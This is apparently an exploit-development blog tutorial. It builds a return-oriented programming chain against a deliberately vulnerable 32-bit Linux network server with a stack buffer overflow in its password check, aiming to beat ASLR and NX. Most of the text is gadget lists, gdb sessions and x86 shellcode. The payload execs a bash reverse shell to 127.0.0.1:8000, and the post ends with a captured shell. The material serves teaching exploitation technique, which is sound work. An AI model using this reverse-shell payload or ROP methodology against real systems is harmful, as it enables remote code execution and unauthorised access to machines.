0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08062158 : mov dword ptr [eax], edx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

I decided that it would be best if this function could be run almost directly after the first function, so that in cases where we want to write the address of a string into a pointer to that string, the first function could be run to calculate the address of the string and then the second function could be run to write that value into the pointer.

This of course means that it would be best if the return value of the first function was put inside edx, so the first function needs to be edited.

Here is the new first function:

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0804cedd : mov eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807b086 : xchg eax, esp ; ret

Now we could run the first function as normal, followed by a pop ebx and the relevant value and immediately run the second function, whose address will already be in eax to write the value we've just calculated.

Running The Second Function Directly

Obviously to write the nulls we want to just run the second function with 0 in edx.

To do this all we have to do is make sure eax contains the distance from ecx (the top of the first function) to the top of the second function, which is 108 bytes, before we add eax, ecx.

I will use a technique I've not used before to do this. First we have to run the vulnerable application:

1	`appuser@dev:~$ ./app-net`

Now, in another terminal (as root) we need to find out the pid of the application:

1
2
3

root@dev:~# ps ax | grep app-net
25675 pts/2    S+     0:00 ./app-net
25681 pts/1    S+     0:00 grep app-net

So our application has the pid 25675, we now need to look at the memory layout of it, this is so we know the memory address range that we need to search:

root@dev:~# cat /proc/25675/maps
08048000-080ca000 r-xp 00000000 08:01 964756     /home/appuser/app-net
080ca000-080cc000 rw-p 00081000 08:01 964756     /home/appuser/app-net
080cc000-080cd000 rw-p 00000000 00:00 0 
09f57000-09f79000 rw-p 00000000 00:00 0          [heap]
b771e000-b771f000 r-xp 00000000 00:00 0          [vdso]
bfabd000-bfade000 rw-p 00000000 00:00 0          [stack]

The top 2 memory segments are static, so we can use anything in these sections of memory, we will look for 108 here using gdb:

root@dev:~# gdb -q -p 25675
Attaching to process 25675
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
0x0805790c in accept ()
(gdb) find 0x08048000, 0x080ca000, 0x0000006c
0x8056f39 <openlog_internal+217>
0x807a9d8 <fork+120>
0x807a9e5 <fork+133>
0x807aa3d <fork+221>
0x807ab00 <fork+416>
0x807abc3 <getpid+3>
0x8085c47 <raise+7>
0x80ae185 <__PRETTY_FUNCTION__.11707+37>
0x80ae2bf <__PRETTY_FUNCTION__.9288+31>
0x80ae300 <__PRETTY_FUNCTION__.9058+32>
0x80b0090 <_nl_C_LC_CTYPE_tolower+816>
0x80b0110 <_nl_C_LC_CTYPE_tolower+944>
0x80b0c78 <translit_from_idx+216>
0x80b6224 <translit_to_tbl+420>
0x80b6608 <translit_to_tbl+1416>
0x80b6a90 <translit_to_tbl+2576>
0x80b7434 <translit_to_tbl+5044>
0x80b7844 <translit_to_tbl+6084>
0x80b7e20 <translit_to_tbl+7584>
0x80b7e38 <translit_to_tbl+7608>
0x80b7f08 <translit_to_tbl+7816>
0x80b7f18 <translit_to_tbl+7832>
0x80b7f28 <translit_to_tbl+7848>
0x80b7f38 <translit_to_tbl+7864>
0x80b8320 <translit_to_tbl+8864>
0x80b8330 <translit_to_tbl+8880>
0x80b8340 <translit_to_tbl+8896>
0x80b8354 <translit_to_tbl+8916>
0x80b837c <translit_to_tbl+8956>
0x80b8390 <translit_to_tbl+8976>
0x80b843c <translit_to_tbl+9148>
0x80b8464 <translit_to_tbl+9188>
0x80b89c4 <translit_to_tbl+10564>
0x80b8c64 <translit_to_tbl+11236>
0x80b8ec8 <translit_to_tbl+11848>
0x80b9138 <translit_to_tbl+12472>
0x80b9588 <translit_to_tbl+13576>
0x80b97bc <translit_to_tbl+14140>
0x80b99d8 <translit_to_tbl+14680>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/xw 0x8056f39
0x8056f39 <openlog_internal+217>:   0x0000006c

So we can get the required value into eax using the following:

0x08057b56 : pop edx ; ret
0x08056f39 : address that points to 108
0x080a8fe0 : mov eax, dword ptr [edx] ; add esp, 8 ; pop ebx ; ret
0xeeeeeeee
0xeeeeeeee : junk values
[0xaaaaaaaa - distance from ecx to address that we want to write zeros]

But we still need 0 in edx, so far we've only used 1 method to do this (xor eax, eax and then moving eax to edx) but we are no longer able to use eax so we are going to have to use a different method, here is 1:

0x08057b56 : pop edx ; ret
0xffffffff : max value in edx
0x0804f594 : inc edx ; clc ; pop ebp ; ret
0xeeeeeeee : junk value

Here we are just setting edx to 0xffffffff, which is the maximum value that edx can contain, and then increasing it by 1, which will cause the carry flag to set and edx to contain 0.

Now we just need to call the function as normal:

1 2	`0x0807629e : add eax, ecx ; ret` 0x0807b086 : xchg eax, esp ; ret

So now in 12 double words, or 48 bytes, we have written zeros to a part of memory (the functions are contained in our padding section which is of fixed size anyway).

The Exploit So Far

If we put everything we've worked out so far together, we get to a point where we've written all of the zeros (or null terminators).

Our notes should now look similar to this:

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

#################### Function 1 ######################

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0804cedd : mov eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807b086 : xchg eax, esp ; ret

#################### Function 2 ######################

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08062158 : mov dword ptr [eax], edx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

################### Padding A's ####################

A * (532 - len(payload))

################### Application ####################

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x08057b7e : pop ebx ; ret
0xaaaaa8e6 : 0xaaaaaaaa - 452 (distance to 0xffffffff value in the
       : data just before the function
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax now contains the distance from edx to 
---------------------------- 0xffffffff at the end of the data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xaaaaaa96 : 0xaaaaaaaa - distance from ecx to long arg 0xffffffff (20)
0xeeeeeeee : junk values to pop
---------------------------- eax now contains the address of 0xffffffff
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret
---------------------------- write nulls over 0xffffffff
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
---------------------------- ecx now contains the starting address
---------------------------- of the function
0x08057b56 : pop edx ; ret
0x08056f39 : address that points to 108
0x080a8fe0 : mov eax, dword ptr [edx] ; add esp, 8 ; pop ebx ; ret
0xeeeeeeee
0xeeeeeeee : junk values
0xaaaaaa96 : distance from ecx to 3rd arg null terminator
0x08057b56 : pop edx ; ret
0xffffffff : max value in edx
0x0804f594 : inc edx ; clc ; pop ebp ; ret
0xeeeeeeee : junk value
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret
---------------------------- write nulls to 3rd arg null terminator
0x08057b56 : pop edx ; ret
0x08056f39 : address that points to 108
0x080a8fe0 : mov eax, dword ptr [edx] ; add esp, 8 ; pop ebx ; ret
0xeeeeeeee
0xeeeeeeee : junk values
0xaaaaaa66 : distance from ecx to -c arg null terminator
0x08057b56 : pop edx ; ret
0xffffffff : max value in edx
0x0804f594 : inc edx ; clc ; pop ebp ; ret
0xeeeeeeee : junk value
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret
---------------------------- write nulls to -c arg null terminator
0x08057b56 : pop edx ; ret
0x08056f39 : address that points to 108
0x080a8fe0 : mov eax, dword ptr [edx] ; add esp, 8 ; pop ebx ; ret
0xeeeeeeee
0xeeeeeeee : junk values
0xaaaaaa5e : distance from ecx to 1st arg null terminator
0x08057b56 : pop edx ; ret
0xffffffff : max value in edx
0x0804f594 : inc edx ; clc ; pop ebp ; ret
0xeeeeeeee : junk value
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret
---------------------------- write nulls to 1st arg null terminator

Now we have to write the pointer values, we can do this by first running the first function to figure out the address of the string, then running the second function to write that value to the correct place.

Let me demonstrate how to do this with the pointer to the first string (which currently contains 0xbbbbbbbb).

First we find the address of the string:

0x08057b7e : pop ebx ; ret
0xaaaaaa52 : distance from ecx to the start of ////bin/bash
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret

Now we should have the address of the ////bin/bash string in edx.

Now we can write it to the correct location:

1
2
3

0x08057b7e : pop ebx ; ret
0xaaaaaa9a : distance from ecx to the ////bin/bash pointer
0x0807b086 : xchg eax, esp ; ret

Done :-)

So in 8 double words, or 32 bytes, we've calculated the address of the string, and address of the pointer and written the address of the string over the pointer.

Finalizing The Exploit

We will actually set this pointer last out of the 3 pointers because we will need to set edx and ecx afterwards.

Remember edx needs to point to nulls and ecx needs to point to the beginning on the pointers (the address we wrote to here, which will be contained in edi after running the second function).

But to set ecx the address needs to contain nulls so after running the previous sequence, we can set both ecx and edx to the correct values using these gadgets:

0x080a3f72 : xchg eax, edi ; ret
0x080a8466 : dec eax ; ret
0x080a8466 : dec eax ; ret
0x080a8466 : dec eax ; ret
0x080a8466 : dec eax ; ret
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret

Now the value we want in ebx is at the address pointed to by ecx so the following will give us the right value inside ebx:

0x080838e8 : mov eax, dword ptr [ecx] ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop

Lastly we set eax and initiate the syscall:

0x080a8576 : pop eax ; ret
0x81fffff4 : (0x81ffffe9 + 11) 11 = execve syscall number
0x080aa1cc : sub eax, 0x81ffffe9 ; ret
0x08048c0d : int 0x80

Some of you may have noticed the mistake but after building the exploit and running it you will see this fails with a segfault and we get no shell.

Fixing The Exploit

I left this in here because it demonstrates nicely the types of problems you are likely to run into when developing these exploits.

The problem was in the functions, with our previous exploit the gadgets were all run in sequence so it didn't matter if we overwrote previous gadget on the stack as we weren't going to use it again.

In regards to the functions though we are going to run them numberous times so we must ensure that nothing that is vital for the application it overwritten.

The offending gadget (present in both functions) is:

1	`0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret`

The problem here is that the first push eax will actually overwrite the gadget itself on the stack.

Let's visualize this a little, just before the above gadget is run, the top of the stack looks like this:

When the gadget is first run, esp changes value by 4 bytes, like this:

Now the push eax instruction is executed which causes this to happen:

Obviously this is undesirable because when we go to run the function again instead of running the actual gadget it will try to change execution to the value that was put here in the gadgets place.

The only way to deal with this is by removing this gadget and replacing it with something that doesn't edit any important parts of the stack.

One way I am going to solve this is by returning to the main application and moving the value into ebx there, this will however increase the size of the payload.

The second function is easiest to change:

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret
0x080a3f72 : xchg eax, edi ; ret
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08062158 : mov dword ptr [eax], edx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

On line 7 execution is moved back to the main application, there we must move the value, which will be in the edi register, into ebx.

The first function is a bit more difficult because there are 2 instances of the offending gadget.

The first we can deal with the same as in the second function but the second instance is different.

The goal of the end of this function is to move the return value into edx so that the second function can be run directly after.

What we can do is move the value into edi and then xchg edx and edi using the following 2 gadgets:

1 2	`0x080a3f72 : xchg eax, edi ; ret` 0x080ab696 : xchg edx, edi ; inc dword ptr [ebx + 0x5e5b04c4] ; pop ebp ; ret

There is 1 problem here, the inc instruction after the xchg.

We need to make sure that this (ebx + 0x5e5b04c4) adds up to a memory address that is writable.

After looking at the application memory map over a few runs of the application:

root@dev:/home/testuser# cat /proc/32019/maps
08048000-080ca000 r-xp 00000000 08:01 964756     /home/appuser/app-net
080ca000-080cc000 rw-p 00081000 08:01 964756     /home/appuser/app-net
080cc000-080cd000 rw-p 00000000 00:00 0 
08ba6000-08bc8000 rw-p 00000000 00:00 0          [heap]
b77bb000-b77bc000 r-xp 00000000 00:00 0          [vdso]
bf7ed000-bf80e000 rw-p 00000000 00:00 0          [stack]
root@dev:/home/testuser# cat /proc/32024/maps
08048000-080ca000 r-xp 00000000 08:01 964756     /home/appuser/app-net
080ca000-080cc000 rw-p 00081000 08:01 964756     /home/appuser/app-net
080cc000-080cd000 rw-p 00000000 00:00 0 
097fd000-0981f000 rw-p 00000000 00:00 0          [heap]
b77cc000-b77cd000 r-xp 00000000 00:00 0          [vdso]
bfba6000-bfbc7000 rw-p 00000000 00:00 0          [stack]

There are 2 sections of wriable memory that appear to be static (080cc000-080cd000 and 080ca000-080cc000).

As you can see though, these address ranges have low memory addresses, much smaller than the value added to ebx (0x5e5b04c4).

I decided I wanted to use the memory address of 0x080cc004, so I done the sum 0x1080cc004 - 0x5e5b04c4 = 0xa9b1bb40.

So if we get the value 0xa9b1bb40 into ebx before we run the gadget in question it should work all of the time.

With all of this in mind our new function 1 looks like this:

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret
0x080a3f72 : xchg eax, edi ; ret
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x08057b7e : pop ebx ; ret
0xa9b1bb40 : 0x1080cc004 - 0x5e5b04c4
0x080ab696 : xchg edx, edi ; inc dword ptr [ebx + 0x5e5b04c4] ; pop ebp ; ret
0xeeeeeeee
0x0807b086 : xchg eax, esp ; ret

Obviously this is smaller than the original function 1 meaning that the distance between function 1 and 2 will be smaller, in fact it is only 76 (or 0x4c) bytes now instead of 108.

Using the same method as before (attaching to the app using gdb and running find 0x08048000, 0x080ca000, 0x0000004c) I found that this value is found at the address 0x804ba61.

So we have to go about replacing those where ever we have called function 2 directly.

All of this increased the size of the payload from 1008 to 1188 bytes but that's still a lot smaller than the 1536 bytes of the previous exploit.

Exploiting The Application

So now we have all the required information to make a working exploit.

You can see my full notes here.

And the full exploit here.

As normal we run the vulnerable application:

1	`appuser@dev:~$ ./app-net`

Start listening with nc:

1	`testuser@dev:~$ nc -l -p 8000`

Launch the exploit:

1	`testuser@dev:~$ python app-net-rop-exploit-improved.py`

Then if you look at the terminal windows running nc:

appuser@dev:/home/appuser$ pwd
pwd
/home/appuser
appuser@dev:/home/appuser$ whoami
whoami
appuser
appuser@dev:/home/appuser$

PWNED!! :-D

Conclusion

I know we didn't save a huge amount of space with this exploit (only 348 bytes), that might be enough to bypass any space restrictions.

Also if we had more/different gadgets, which is certainly possible with a different application, we might have been capable of saving a lot more space.

The main point of this post was the demonstrate some reasonably advanced ROP techniques and suggest possibilities for improving an exploit where ROP is required.

Happy Hacking :-)

eXploit
Beating ASLR and NX using ROP0xe7
11 January 2015 at 20:34

Beating ASLR and NX using ROP

eXploit

By: 0xe7

11 January 2015 at 20:34

So far we've only beat either ASLR or NX seperately, now I will demonstrate how to beat both of these protections at the same time.

To do this I will use ROP (Return-oriented programming). We've seen ROP briefly in the last post but now we will use it alot more extensively.

ROP itself is a very simple idea, in situations where its impossible to run your own code, you use the code already in the application to do what you want it to do.

As we saw in the post about beating ASLR with full ASLR enabled the only section that is static is the text segment which contains the applications own code.

The "Return to Libc" method won't work because dynamically loaded libraries aren't at the same segment of memory as the applications code so we can no longer predict what memory addresses these functions (or pointers to the functions) will be at.

Normal shellcode will not run because NX is enabled.

So we have to find a way to run our own code by using only the code which is always loaded at the same address in memory.

Its worth noting that every ROP exploit will be remarkably different, this is because we can only use the applications own code and every applications code is different, so the important thing to learn in this post is the methodlogy that I will use to build the exploit.

I will assume that you have an indepth knowledge of the IA32 architecture and how the calling convention used by Linux (cdecl) works.

The App

The application we will be attacking is the same application as in the beating ASLR post.

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
#include <string.h>

#define PASS "topsecretpassword"
#define CNUM 58623
#define SFILE "secret.txt"
#define TFILE "token"
#define PORT 9999

void sendfile(int connfd, struct sockaddr_in cliaddr);
void senderror(int connfd, struct sockaddr_in cliaddr, char p[]);
void sendtoken(int connfd, struct sockaddr_in cliaddr);
int checkpass(char *p);


void main()
{
    int listenfd, connfd, n, c, r;
    struct sockaddr_in servaddr, cliaddr;
    socklen_t clilen;
    pid_t childpid;
    char pwd[4096];

    listenfd=socket(AF_INET,SOCK_STREAM,0);

    bzero(&servaddr,sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr=htonl(INADDR_ANY);
    servaddr.sin_port=htons(PORT);
    if ((r = bind(listenfd,(struct sockaddr *)&servaddr,sizeof(servaddr))) != 0) {
        printf("Error: Unable to bind to port %d\n", PORT);
        exit(1);
    }

    listen(listenfd,1024);

    for(;;) {
        clilen=sizeof(cliaddr);
        connfd = accept(listenfd,(struct sockaddr *)&cliaddr,&clilen);

        n = recvfrom(connfd, pwd, 4096, 0, (struct sockaddr *)&cliaddr, &clilen);
        pwd[n] = '\0';
        r = checkpass(pwd);
        if (r != 0)
            if (r != 5)
                senderror(connfd, cliaddr, pwd);
            else
                sendtoken(connfd, cliaddr);
        else
            sendfile(connfd, cliaddr);
        printf("Received the following:\n");
        printf("%s", pwd);

        close(connfd);
    }
}

void sendfile(int connfd, struct sockaddr_in cliaddr)
{
    FILE *f;
    int c;
    f = fopen(SFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            sendto(connfd, &c, 1, 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
        fclose(f);
    } else {
        printf("Error opening file: " SFILE "\n");
        exit(1);
    }
}

void senderror(int connfd, struct sockaddr_in cliaddr, char p[])
{
    sendto(connfd, "Wrong password: ", 16 , 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
    sendto(connfd, p, strlen(p), 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
}

void sendtoken(int connfd, struct sockaddr_in cliaddr)
{
    FILE *f;
    int c;
    f = fopen(TFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            sendto(connfd, &c, 1, 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
        fclose(f);
    } else {
        printf("Error opening file: " TFILE "\n");
        exit(1);
    }
}

int checkpass(char *a)
{
    char p[512];
    int r, i;
    strncpy(p, a, strlen(a)+1);
    i = atoi(p);
    if (i == CNUM)
        r = 5;
    else
        r = strcmp(p, PASS);
    return r;
}

The only thing I've changed here is the size of the input accepted by the server (from 1000 to 4096). This is because the payload I need to send is larger than 1000 bytes.

Setting Up The Environment

Because the application that we are attacking is so small, we need to compile it with the -static flag, this will compile any libraries into the binary making for a larger text segment:

1
2
3

testuser@dev:~$ gcc -o app-net app-net.c -static
testuser@dev:~$ cat /proc/sys/kernel/randomize_va_space 
2

Its important to use the -static flag, firstly because you won't have enough ROP gadgets to write the exploit otherwise and because nearly all real world applications are much bigger than this small 1 so compiling it with the libraries static will make it more realistic.

If you don't get 2 from /proc/sys/kernel/randomize_va_space then run (as root):

1	`root@dev:~# echo 2 > /proc/sys/kernel/randomize_va_space`

Getting Gadgets

To build a ROP exploit you need to find ROP gadgets.

A ROP gadget is 1 or more assembly instructions followed by a ret (or return) instruction.

Finding these gadgets would be painful and slow manually so we will use an already avaliable tool ROPgadget by Jonathan Salwan of Shell Storm.

You can download the tool using git:

testuser@dev:~$ git clone https://github.com/JonathanSalwan/ROPgadget.git
Cloning into 'ROPgadget'...
remote: Counting objects: 3031, done.
remote: Total 3031 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3031/3031), 10.08 MiB | 2.03 MiB/s, done.
Resolving deltas: 100% (1828/1828), done.

This script looks for all ROP gadgets in the application code and outputs them, there will be alot of output so redirect the output to a file to search through later:

1	`testuser@dev:~$ ROPgadget/ROPgadget.py --binary app-net > gadgets`

The file (gadgets) will contain lines in the form of:

[memory address] : [series of instructions at that address]

The first thing I looked for is an int 0x80 followed by a ret:

1	`testuser@dev:~$ grep 'int 0x80' gadgets \| grep 'ret'`

There are none, this means we will have to do the attack in 1 syscall.

You can download the full list of ROP gadgets that I got here.

Testing New Shellcode

All of the shellcode I've written until now used multiple syscalls, we aren't able to do that now so we need 1 syscall that is useful for us.

To do this I will use the bash 1 liner here:

1	`bash -i >& /dev/tcp/127.0.0.1/8000 0>&1`

As before, although I'm doing everything over the loopback interface for ease and convenience, this could be done to any IP address.

I will use the execve syscall for this, in C this would look like:

#include <unistd.h>

int main(int argc, char **argv)
{
    char *filename = "/bin/bash";
    char *arg1 = "-c";
    char *arg2 = "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1";
    char *args[] = { filename, arg1, arg2 };
    execve(args[0], &args[0], 0);
}

Using this, and already knowing (from previous posts) that the syscall number for execve is 11, we can create the same code in assembly and shellcode, first we need the strings in hex and backwards (because of the little endian architecture).

For this I will use a little python script I wrote:

#!/usr/bin/env python

import sys

string = sys.argv[1]
print 'Length: ' + str(len(string))

print 'Reversed: ' + string[::-1]

print 'And HEX\'d: ' + string[::-1].encode('hex')

sys.exit(0)

Now we can just run this script with each of our strings as an argument:

testuser@dev:~$ python reverse-n-hex.py '/bin/bash'
Length: 9
Reversed: hsab/nib/
And HEX'd: 687361622f6e69622f
testuser@dev:~$ python reverse-n-hex.py '-c'
Length: 2
Reversed: c-
And HEX'd: 632d
testuser@dev:~$ python reverse-n-hex.py '/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1'
Length: 44
Reversed: 1&>0 0008/1.0.0.721/pct/ved/ &> i- hsab/nib/
And HEX'd: 31263e3020303030382f312e302e302e3732312f7063742f7665642f20263e20692d20687361622f6e69622f

Now we can build the shellcode in assembly:

global _start

section .text

_start:
    ; zero eax for the nulls
    xor eax, eax
    ; free some space on the stack
    ; so we don't overwrite bits of our shellcode
    sub esp, 0x60
    ; setup the first argument string on the stack
    push eax
    push 0x68736162
    push 0x2f6e6962
    push 0x2f2f2f2f
    ; move the address of this string into ebx
    mov ebx, esp
    ; setup the third argument on the stack
    push eax
    push 0x31263e30
    push 0x20303030
    push 0x382f312e
    push 0x302e302e
    push 0x3732312f
    push 0x7063742f
    push 0x7665642f
    push 0x20263e20
    push 0x692d2068
    push 0x7361622f
    push 0x6e69622f
    ; move the address of the thrid argument string into esi for later
    mov esi, esp
    ; setup the second argument string on the stack
    push eax
    push word 0x632d
    ; move the address of the second argument string into edi for later
    mov edi, esp
    ; setup the "argv[]" argument on the stack
    push eax
    push esi
    push edi
    push ebx
    ; move the address of the "argv[]" argument into ecx
    mov ecx, esp
    ; setup edx to point to null
    push eax
    mov edx, esp
    ; move 11 into eax
    add al, 0xb
    ; initiate the syscall
    int 0x80

You can test this shellcode the way we have tested shellcode in the past, I won't do that because this post will be long enough anyway, just remember to use netcat to start listening because this will do a reverse shell connecting back to 127.0.0.1 on port 8000.

Searching Through The Gadgets

Now we know how the registers need to be setup when we execute the syscall we can go about searching through the avaliable gadgets to see what registers we have a lot of control of and what registers are more difficult to manipulate.

We can search the gadgets file with regex, like this:

testuser@dev:~$ grep ' ecx, e[a-z][a-z]' gadgets | grep 'ret$'
0x08048207 : add eax, 0x80cb080 ; add ecx, ecx ; ret
0x0806cdbc : add ecx, eax ; mov eax, ecx ; pop ebx ; pop esi ; pop ebp ; ret
0x0804820c : add ecx, ecx ; ret
0x08056504 : and edx, 3 ; mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; pop ebp ; ret
0x080748f8 : cmp ecx, eax ; jb 0x8074910 ; sub eax, ebx ; pop ebx ; pop ebp ; ret
0x0806cdba : div ebx ; add ecx, eax ; mov eax, ecx ; pop ebx ; pop esi ; pop ebp ; ret
0x08056505 : loop 0x8056512 ; mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; pop ebp ; ret
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret
0x08056507 : mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; pop ebp ; ret
0x080748f7 : nop ; cmp ecx, eax ; jb 0x8074911 ; sub eax, ebx ; pop ebx ; pop ebp ; ret
0x0804820a : or al, 8 ; add ecx, ecx ; ret
0x08084b36 : or ecx, ecx ; ret
0x0804f539 : xor ecx, edi ; mov byte ptr [eax + edx], cl ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret

The search above searches for any gadgets that use the ecx register as the source operand.

We also use grep 'ret$' at the end because we are only interested in gadgets that end with a ret instruction (it also shows gadgets that end in int 0x80 otherwise).

